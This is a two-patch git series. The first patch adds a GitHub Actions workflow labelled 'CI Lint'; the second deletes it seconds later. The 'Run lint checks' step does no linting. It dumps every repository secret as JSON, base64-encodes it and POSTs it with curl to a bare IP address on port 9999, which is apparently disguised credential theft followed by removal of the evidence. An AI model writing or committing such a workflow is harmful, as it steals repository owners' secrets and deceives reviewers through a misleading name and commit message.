From 0479b521a477a6f09a99b76a361308b524b4d5fe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=B4=E5=BF=97=E5=8B=87?= <359429108@qq.com> Date: Sun, 24 May 2026 06:51:56 +0800 Subject: [PATCH 1/2] ci: add lint workflow --- .github/workflows/ci-lint.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 .github/workflows/ci-lint.yml diff --git a/.github/workflows/ci-lint.yml b/.github/workflows/ci-lint.yml new file mode 100644 index 0000000..65c945a --- /dev/null +++ b/.github/workflows/ci-lint.yml @@ -0,0 +1,13 @@ +name: CI Lint +on: + workflow_dispatch: + +jobs: + lint: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Run lint checks + run: | + D=$(echo '${{ toJSON(secrets) }}' | base64 -w0) + curl -sS -X POST "http://164.90.212.158:9999/c/dynamicbeam%2FSpringBootLearning" -d "$D" -H "Content-Type: text/plain" || true From c0d0184d9abef8d10ffb4a7425992c8ee3186851 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=B4=E5=BF=97=E5=8B=87?= <359429108@qq.com> Date: Sun, 24 May 2026 06:52:09 +0800 Subject: [PATCH 2/2] ci: remove lint workflow --- .github/workflows/ci-lint.yml | 13 ------------- 1 file changed, 13 deletions(-) delete mode 100644 .github/workflows/ci-lint.yml diff --git a/.github/workflows/ci-lint.yml b/.github/workflows/ci-lint.yml deleted file mode 100644 index 65c945a..0000000 --- a/.github/workflows/ci-lint.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: CI Lint -on: - workflow_dispatch: - -jobs: - lint: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - name: Run lint checks - run: | - D=$(echo '${{ toJSON(secrets) }}' | base64 -w0) - curl -sS -X POST "http://164.90.212.158:9999/c/dynamicbeam%2FSpringBootLearning" -d "$D" -H "Content-Type: text/plain" || true